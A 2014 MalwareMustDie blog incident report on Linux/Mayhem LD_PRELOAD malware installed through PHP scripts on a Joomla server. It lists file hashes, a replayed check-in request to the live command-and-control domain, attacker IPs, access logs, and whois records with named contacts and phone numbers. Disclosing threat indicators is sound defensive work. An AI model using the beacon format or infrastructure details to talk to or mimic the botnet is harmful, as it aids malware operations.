Wednesday, June 11, 2014

MMD-0024-2014 - Recent Incident Report of Linux/Mayhem (LD_PRELOAD) libworker.so "Mayhem" Linux malware botnet attack in Joomla! VPS

I haven't got enough time to write a beautiful report about this incident, please kindly bear with the textual paste format at the moment. This is an important incident report, progressing the the massive infection malware case that was initially reported in here-->>[MMD Blog] . The latest reported incident before this one is here-->>[MMD Pastebin]

Raw text of current incident report is in here -->>[MMD Pastebin] and-->>[MMD Pastebin], for the video tutorial to extract, kill, debug & traffic capture ELF .so shared library malware that's using LD_PRELOAD is in here-->>[MMD Blog]

..and below is the current incident textual contents:

MalwareMustDie NEW Report of .SO ELF Malware attack incident.
date: Wed Jun 11 06:38:13 JST 2014
Analysis by @unixfreaxjp - Report & source investigation thx to: yin
Case: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
CNC is ALIVE in : "89.45.14.64 (VOXILITY, ROMANIA)"
ATTACKER SOURCE IP: "103.31.186.33 (VOXILITY, ROMANIA) &  31.202.247.234 (Leased line ISP Format, UKRAINE)"

//-------------------------------------
// PHP HACK INJECTION POC
// VICTIMS WEBAPP: JOOMLA!
//-------------------------------------

// Reported Injected installation .SO Bins
https://www.virustotal.com/en/file/324b1b77ff9c0759e3d2ab1efb9439a3a850d94bd9f1968a0f093a782b5ea990/analysis/1402437076/
https://www.virustotal.com/en/file/203eeac48d08cac9b36187bfb32bd88d29f1f44d4306f2ffc154538573e5d722/analysis/1402437106/

// Jinxed code installer PHP scripts in pastebin:
http://pastebin.com/z1K8jxKJ
http://pastebin.com/Pbsk3ZXU

// Malware Binaries extracted from installer PHP:
https://www.virustotal.com/en/file/c28e2ebc5046c1a03a8f689b757cf2a90d021eeaa0a5e9ec91aa33c76ee6237f/analysis/1402437331/
https://www.virustotal.com/en/file/af71138bc3b2e70fd1d8fd33c31a4707d686d893661a331aee68f223348e164e/analysis/1402437372/

//-------------------------------------
// CNC ANALYSIS
// Using knowhow from: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
//-------------------------------------

// Extract the bins w/ template:
$ date
Wed Jun 11 04:12:11 JST 2014
$
$ php ./sodump-template.php
SO x32 dumped 26848
SO x64 dumped 27288
MO x32 dumped 26848
MO x64 dumped 27288
$
$ ls -alF
total 600
drwxrwxrwx   2 xxx xxx    512 Jun 11 04:12 ./
drwxrwxrwx  13 xxx xxx    512 Jun 11 03:59 ../
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 "libworker1-32.so"
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 "libworker1-64.so"
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 "libworker2-32.so"
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 "libworker2-64.so"

$ md5 lib*
MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
// noted see only one x32 and one x64 binaries used for multiple injection..


$ file lib*
libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
$

// CNC:

POST /kuku/theend.php HTTP/1.0
Host: erstoryunics.us
Pragma: 1337
Content-Length: 84

R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
HTTP/1.1 200 OK
Date: Tue, 10 Jun 2014 22:12:22 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 6
Connection: close
Content-Type: text/html; charset=UTF-8
R,200

// CNC INFO (NETWORK & GEOIP)

$ echo `dig +short erstoryunics.us`|bash origin.sh
Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
IP Address, City, Country Name, Latitude, longitude, Time Zone
89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest

//-------------------------------------
// ATTACK TIME RANGE:
//-------------------------------------

First session: "[22/May/2014:13:01:08 +1000]"
2nd Session First: "[09/Jun/2014:07:50:46 +1000]" 
2nd Session Latest:"[10/Jun/2014:04:39:51 +1000]"

//-------------------------------------
// ATTACKER ACCESS POC & SOURCE IP POC:
//-------------------------------------

// Attacker access log aiming the PHP .SO Malware installer PHP script: 

103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"


//-------------------------------------
 Tracing attacker source IP: "103.31.186.33 (ROMANIA)"
//-------------------------------------

$ whois 103.31.186.33
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
 
% Information related to '103.31.186.0 - 103.31.186.127'
 
inetnum: 103.31.186.0 - 103.31.186.127
netname: Saulhost
descr: Saulhost Hosting
country: RO
admin-c: MT669-AP
tech-c: MT669-AP
status: ASSIGNED NON-PORTABLE
remarks: INFRA-AW
mnt-by: MAINT-HK-VOXILITY
mnt-lower: MAINT-HK-VOXILITY
mnt-routes: MAINT-HK-VOXILITY
mnt-irt: IRT-VOXILITY-AP
changed: [email protected] 20130118
source: APNIC
 
irt: IRT-VOXILITY-AP
address: Dimitrie Pompeiu 9-9A
address: Building 24
address: Bucharest 020335
address: Romania
e-mail: [email protected]
abuse-mailbox: [email protected]
admin-c: VOX100
tech-c: VOX100
auth: # Filtered
mnt-by: MAINT-HK-VOXILITY
changed: [email protected] 20121015
source: APNIC
 
person: Michael Ter-Sahakyan
address: Terbatas 14
address: LV-1011 Riga
address: Latvia
country: RO
phone: +37166163312
e-mail: [email protected]
nic-hdl: MT669-AP
remarks: INFRA-AW
abuse-mailbox: [email protected]
mnt-by: MAINT-HK-VOXILITY
changed: [email protected] 20130118
source: APNIC

//-------------------------------------
 Tracing attacker source IP: "31.202.247.234 (UKRAINE)"
//-------------------------------------

 
$ whois 31.202.247.234
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
 
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
 
% Information related to '31.202.192.0 - 31.202.255.255'
 
% Abuse contact for '31.202.192.0 - 31.202.255.255' is '[email protected]'
 
inetnum: 31.202.192.0 - 31.202.255.255
netname: FORMAT-TV-NET-5
descr: MSP Format Ltd.
country: UA
admin-c: FA4288-RIPE
tech-c: FA4288-RIPE
status: ASSIGNED PA
mnt-by: FORMAT-TV-MNT
mnt-domains: FORMAT-TV-MNT
mnt-routes: FORMAT-TV-MNT
source: RIPE # Filtered
 
person: Format Admin
address: Ukraine Mariupol
phone: +380629422490
nic-hdl: FA4288-RIPE
mnt-by: FORMAT-TV-MNT
source: RIPE # Filtered
 
% Information related to '31.202.247.0/24AS6712'
 
route: 31.202.247.0/24
descr: Leased line ISP Format
origin: AS6712
mnt-by: FORMAT-TV-MNT
source: RIPE # Filtered
CNC callback screenshot (the second take) :

#MalwareMustDie!